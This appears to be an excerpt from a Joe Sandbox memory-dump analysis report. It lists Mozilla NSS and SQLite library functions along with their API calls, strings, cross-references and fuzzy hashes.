Opcode Fuzzy Hash: da79596ae0465902b0cbc5787a02517e214dec1a24e9e6cccd104f0fc4e5a6c7
Instruction Fuzzy Hash: B121B0B5B0515237FB2066BA5C09F7B3ABC9B8A6A9B340635B939D66D0DE60D8008261

Function 6CE27D70 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 179COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CE27E27
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CE27E67
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001065F,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000003,?,?), ref: 6CE27EED
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001066C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CE27F2E

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CE27ED8, 6CE27F08, 6CE27F19
database corruption, xrefs: 6CE27EE2, 6CE27F23
%s at line %d of [%.10s], xrefs: 6CE27EE7, 6CE27F28

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 912837312-598938438
Opcode ID: f91e6818998064ad49a49ff737c2942fad9e81960ae0fa41db9712c7bfef4fe6
Instruction ID: e8813f52363dc3c1dd7a1d981a9e32415ad86b3cf7a0bacb1235f532e125d700
Opcode Fuzzy Hash: f91e6818998064ad49a49ff737c2942fad9e81960ae0fa41db9712c7bfef4fe6
Instruction Fuzzy Hash: F261C075B042059FDB05CF29C880BAA37B2BF46308F2448ACEC095BB52D735EC56CBA1

Function 6CE0FCF0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 155COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124AC,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CE0FD7A
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CE0FD94
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124BF,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CE0FE3C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CE0FE83

Part of subcall function 6CE0FEC0: memcmp.VCRUNTIME140(?,?,?,?,00000000,?), ref: 6CE0FEFA
Part of subcall function 6CE0FEC0: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00000000,?), ref: 6CE0FF3B

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CE0FD64, 6CE0FE26
database corruption, xrefs: 6CE0FD6E, 6CE0FE30
%s at line %d of [%.10s], xrefs: 6CE0FD73, 6CE0FE35

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log$memcmpmemcpy
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 1169254434-598938438
Opcode ID: 8a83c3685cdaa7f0c2d249e3523a6453657b91a36eb561710ee7f0941f2ea81f
Instruction ID: 5028110f7da4e149fdf62621ab3104cfd4ffd73a6cbb818ffba201b87da86ada
Opcode Fuzzy Hash: 8a83c3685cdaa7f0c2d249e3523a6453657b91a36eb561710ee7f0941f2ea81f
Instruction Fuzzy Hash: 96516F75B002059FDB04CFA9C890AAEB7B1FF48318F244469EA05AB752E735EC61CBD5

Function 6CF52F70 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 123stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CF52FFD
sqlite3_initialize.NSS3 ref: 6CF53007
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6CF53032
sqlite3_mprintf.NSS3(6CFBAAF9,?), ref: 6CF53073
sqlite3_free.NSS3(?), ref: 6CF530B3
sqlite3_mprintf.NSS3(sqlite3_get_table() called with two or more incompatible queries), ref: 6CF530C0

Strings

sqlite3_get_table() called with two or more incompatible queries, xrefs: 6CF530BB

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: sqlite3_mprintf$memcpysqlite3_freesqlite3_initializestrlen
String ID: sqlite3_get_table() called with two or more incompatible queries
API String ID: 750880481-4279182443
Opcode ID: 4df6cee9f2c1175ba753d84f3139f51a7d8b93c279c83ac5e611fd0656e22854
Instruction ID: b64fa249d91142ef08a4bf3c11740c0bf5b2a85b47c6ab5f567b0198c285549b
Opcode Fuzzy Hash: 4df6cee9f2c1175ba753d84f3139f51a7d8b93c279c83ac5e611fd0656e22854
Instruction Fuzzy Hash: 14419272600706ABDB00CF29D880A8AB7F5FF54358F548628ED5987B40E731F969CBD1

Function 6CED5ED0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 80stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(q]l), ref: 6CED5F0A
TlsGetValue.KERNEL32 ref: 6CED5F1F
EnterCriticalSection.KERNEL32(89000904), ref: 6CED5F2F
PR_Unlock.NSS3(890008E8), ref: 6CED5F55
PR_SetError.NSS3(00000000,00000000), ref: 6CED5F6D
SECMOD_UpdateSlotList.NSS3(8B4274C0), ref: 6CED5F7D

Part of subcall function 6CED5220: TlsGetValue.KERNEL32(00000000,890008E8,?,6CED5F82,8B4274C0), ref: 6CED5248
Part of subcall function 6CED5220: EnterCriticalSection.KERNEL32(0F6CFA0D,?,6CED5F82,8B4274C0), ref: 6CED525C
Part of subcall function 6CED5220: PR_SetError.NSS3(00000000,00000000), ref: 6CED528E
Part of subcall function 6CED5220: PR_Unlock.NSS3(0F6CF9F1), ref: 6CED5299
Part of subcall function 6CED5220: free.MOZGLUE(00000000), ref: 6CED52A9

Strings

q]l, xrefs: 6CED5EDB, 6CED5F09

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue$ListSlotUpdatefreestrlen
String ID: q]l
API String ID: 3150690610-3830342008
Opcode ID: db610fb22f90eba5593755c70f0870fa5eae8904029c94719f7c270daa33a37b
Instruction ID: 0a214ef923659a95259b428e9f70815bbc65cf664d69ea4eda2874aa0c38e7bc
Opcode Fuzzy Hash: db610fb22f90eba5593755c70f0870fa5eae8904029c94719f7c270daa33a37b
Instruction Fuzzy Hash: F921B6F1D002045FDB109F68DC417EEBBB4EF09308F654029E905AB741EB31A955CBD2

Function 6CE98CF0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 76COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,?,6CEA124D,00000001), ref: 6CE98D19
EnterCriticalSection.KERNEL32(?,?,?,?,6CEA124D,00000001), ref: 6CE98D32
PL_ArenaRelease.NSS3(?,?,?,?,?,6CEA124D,00000001), ref: 6CE98D73
PR_Unlock.NSS3(?,?,?,?,?,6CEA124D,00000001), ref: 6CE98D8C

Part of subcall function 6CF2DD70: TlsGetValue.KERNEL32 ref: 6CF2DD8C
Part of subcall function 6CF2DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CF2DDB4

PR_Unlock.NSS3(?,?,?,?,?,6CEA124D,00000001), ref: 6CE98DBA

Strings

KRAM, xrefs: 6CE98D3E
KRAM, xrefs: 6CE98CF9

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
String ID: KRAM$KRAM
API String ID: 2419422920-169145855
Opcode ID: 773f3e2cc106b24aacd01991d69d32889345fe410f0d86c9dc8d7cee9c345b66
Instruction ID: 18478c9c869ff88a02a71ffe7b087c36ad4af16455ae7788e7b86119f74559da
Opcode Fuzzy Hash: 773f3e2cc106b24aacd01991d69d32889345fe410f0d86c9dc8d7cee9c345b66
Instruction Fuzzy Hash: A921A1B1A046018FDB50EF78C48465AB7F4FF45308F25896AD99887721EB35E882CB91

Function 6CEBACC0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageDecryptFinal), ref: 6CEBACE6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CEBAD14
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CEBAD23

Part of subcall function 6CF9D930: PL_strncpyz.NSS3(?,?,?), ref: 6CF9D963

PR_LogPrint.NSS3(?,00000000), ref: 6CEBAD39

Strings

C_MessageDecryptFinal, xrefs: 6CEBACE1
hSession = 0x%x, xrefs: 6CEBACFE, 6CEBAD0E
(CK_INVALID_HANDLE), xrefs: 6CEBAD1C

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageDecryptFinal
API String ID: 332880674-3521875567
Opcode ID: 27fe44850c5dac15544ff4a5520bd877ac43b5c92069b1e92d7e365ba6b28d6d
Instruction ID: 9f54bc18d4b49f1301e08e4aafa726bcc853023ffc4e4b30ee10d93ebc4c4d49
Opcode Fuzzy Hash: 27fe44850c5dac15544ff4a5520bd877ac43b5c92069b1e92d7e365ba6b28d6d
Instruction Fuzzy Hash: 55213A30A00108EFDF849B64DE88B7A7775AB4A70EF140429E909A7711DF359D09CB92

Function 6CF90ED0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6CF90EE6
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6CF90EFA

Part of subcall function 6CE7AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6CE7AF0E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF90F16
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF90F1C
DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF90F25
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF90F2B

Strings

Assertion failure: %s, at %s:%d, xrefs: 6CF90ED9, 6CF90EE5, 6CF90F06, 6CF90F0B
Aborting, xrefs: 6CF90EB3

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: __acrt_iob_func$BreakDebugPrint__stdio_common_vfprintfabortfflush
String ID: Aborting$Assertion failure: %s, at %s:%d
API String ID: 2948422844-1374795319
Opcode ID: bf5942884b8626e7a9ac1cdc41ecbf470a2ce658e17fba81475a74c4113c1a97
Instruction ID: b020cba05fccd2fba567c9a30dde18787472e6e4df2301897caf6f5be7f9bd8d
Opcode Fuzzy Hash: bf5942884b8626e7a9ac1cdc41ecbf470a2ce658e17fba81475a74c4113c1a97
Instruction Fuzzy Hash: F001D2B6A10104BBEF01AFA4DC45E9B3F3CEF4A368B004025FD0A87711D671EA5087A2

Function 6CF71C40 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 45COMMON

Download Yara Rule

APIs

sqlite3_mprintf.NSS3(non-deterministic use of %s() in %s,?,a CHECK constraint,w=l,?,?,6CE74E1D), ref: 6CF71C8A
sqlite3_free.NSS3(00000000), ref: 6CF71CB6

Strings

w=l, xrefs: 6CF71C44
non-deterministic use of %s() in %s, xrefs: 6CF71C85
an index, xrefs: 6CF71C67
a CHECK constraint, xrefs: 6CF71C76, 6CF71C81
a generated column, xrefs: 6CF71C6C

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: sqlite3_freesqlite3_mprintf
String ID: a CHECK constraint$a generated column$an index$non-deterministic use of %s() in %s$w=l
API String ID: 1840970956-366597085
Opcode ID: fdb223fde9164428b4cf5736e2cee6f2316319b9f9dff1e4a064556afd83befc
Instruction ID: 51550e925759b429ffd787ecb0c61b50c23570d4ba43066fe696f49e501eb5df
Opcode Fuzzy Hash: fdb223fde9164428b4cf5736e2cee6f2316319b9f9dff1e4a064556afd83befc
Instruction Fuzzy Hash: 29014CB1A001404BD700BF68D4129B273E5EFC134CB15487DEC489BB02EB32E856C7A1

Function 6CF54D80 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 36COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CF54DC3
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CF54DE0

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CF54DCB
misuse, xrefs: 6CF54DD5
invalid, xrefs: 6CF54DB8
%s at line %d of [%.10s], xrefs: 6CF54DDA
API call with %s database connection pointer, xrefs: 6CF54DBD

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: f538a2d830dcf659fd91b07b979f0ff9b1fd038b9b4b531f1a1eea044fc2c2b6
Instruction ID: c02059a50f833437a166b95d9de8d5bdecb2fd170b6841eebfbf656409483b49
Opcode Fuzzy Hash: f538a2d830dcf659fd91b07b979f0ff9b1fd038b9b4b531f1a1eea044fc2c2b6
Instruction Fuzzy Hash: 82F0B426A145646BD6014117CC10FD63B954F12319F9609A1EF08BBA52D717AC708395

Function 6CF54DF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 35COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CF54E30
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CF54E4D

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CF54E38
misuse, xrefs: 6CF54E42
invalid, xrefs: 6CF54E25
%s at line %d of [%.10s], xrefs: 6CF54E47
API call with %s database connection pointer, xrefs: 6CF54E2A

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: 1d8ca6a06f88b374a8d0494d3d27268cbdc07c0d38b6ce12c05e9fbf5e831d57
Instruction ID: 9934c6149293a1e189a1fa2c1b6271998f9bfad9a4aa319039872fdb333d3666
Opcode Fuzzy Hash: 1d8ca6a06f88b374a8d0494d3d27268cbdc07c0d38b6ce12c05e9fbf5e831d57
Instruction Fuzzy Hash: 39F02715F449282BE61102279C14FC33B854B21329F9964A1EB0877E92D717AC7242D2

Function 6CE89FB0 Relevance: 12.2, APIs: 8, Instructions: 198COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CE8A086
EnterCriticalSection.KERNEL32(?), ref: 6CE8A09B
PR_Unlock.NSS3(?), ref: 6CE8A0B7
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CE8A0E9
TlsGetValue.KERNEL32 ref: 6CE8A11B
EnterCriticalSection.KERNEL32(?), ref: 6CE8A12F
PR_Unlock.NSS3(?), ref: 6CE8A148

Part of subcall function 6CEA1A40: PR_Now.NSS3(?,00000000,6CE828AD,00000000,?,6CE9F09A,00000000,6CE828AD,6CE893B0,?,6CE893B0,6CE828AD,00000000,?,00000000), ref: 6CEA1A65

Part of subcall function 6CEA1940: CERT_DestroyCertificate.NSS3(00000000,00000000,?,6CEA4126,?), ref: 6CEA1966

PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CE8A1A3

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Arena_CriticalEnterFreeSectionUnlockUtilValue$CertificateDestroy
String ID:
API String ID: 3953697463-0
Opcode ID: 47d2583943db96c7238ba9fbe27eb287bbf8b7594b032c890705f9aa4c84ade5
Instruction ID: 7cdc27c500834edcc4fd5a6d0be1ee97d002c6828ade38c5031d4463a5380486
Opcode Fuzzy Hash: 47d2583943db96c7238ba9fbe27eb287bbf8b7594b032c890705f9aa4c84ade5
Instruction Fuzzy Hash: 2E51F4B2E416009BEB109F79CC44AAB77B8AF8630CB35412DEC1D97781EB31E846C691

Function 6CEC0C90 Relevance: 12.2, APIs: 8, Instructions: 191memorythreadCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(00000000,00000000,6CEC1444,?,00000001,?,00000000,00000000,?,?,6CEC1444,?,?,00000000,?,?), ref: 6CEC0CB3

Part of subcall function 6CF2C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF2C2BF

PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6CEC1444,?,00000001,?,00000000,00000000,?,?,6CEC1444,?), ref: 6CEC0DC1
PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6CEC1444,?,00000001,?,00000000,00000000,?,?,6CEC1444,?), ref: 6CEC0DEC

Part of subcall function 6CEE0F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6CE82AF5,?,?,?,?,?,6CE80A1B,00000000), ref: 6CEE0F1A
Part of subcall function 6CEE0F10: malloc.MOZGLUE(00000001), ref: 6CEE0F30
Part of subcall function 6CEE0F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6CEE0F42

SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6CEC1444,?,00000001,?,00000000,00000000,?), ref: 6CEC0DFF
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6CEC1444,?,00000001,?,00000000), ref: 6CEC0E16
free.MOZGLUE(?,?,?,?,?,?,?,?,?,6CEC1444,?,00000001,?,00000000,00000000,?), ref: 6CEC0E53
PR_GetCurrentThread.NSS3(?,?,?,?,6CEC1444,?,00000001,?,00000000,00000000,?,?,6CEC1444,?,?,00000000), ref: 6CEC0E65
PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6CEC1444,?,00000001,?,00000000,00000000,?), ref: 6CEC0E79

Part of subcall function 6CED1560: TlsGetValue.KERNEL32(00000000,?,6CEA0844,?), ref: 6CED157A
Part of subcall function 6CED1560: EnterCriticalSection.KERNEL32(?,?,?,6CEA0844,?), ref: 6CED158F
Part of subcall function 6CED1560: PR_Unlock.NSS3(?,?,?,?,6CEA0844,?), ref: 6CED15B2

Part of subcall function 6CE9B1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6CEA1397,00000000,?,6CE9CF93,5B5F5EC0,00000000,?,6CEA1397,?), ref: 6CE9B1CB
Part of subcall function 6CE9B1A0: free.MOZGLUE(5B5F5EC0,?,6CE9CF93,5B5F5EC0,00000000,?,6CEA1397,?), ref: 6CE9B1D2

Part of subcall function 6CE989E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6CE988AE,-00000008), ref: 6CE98A04
Part of subcall function 6CE989E0: EnterCriticalSection.KERNEL32(?), ref: 6CE98A15
Part of subcall function 6CE989E0: memset.VCRUNTIME140(6CE988AE,00000000,00000132), ref: 6CE98A27
Part of subcall function 6CE989E0: PR_Unlock.NSS3(?), ref: 6CE98A35

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
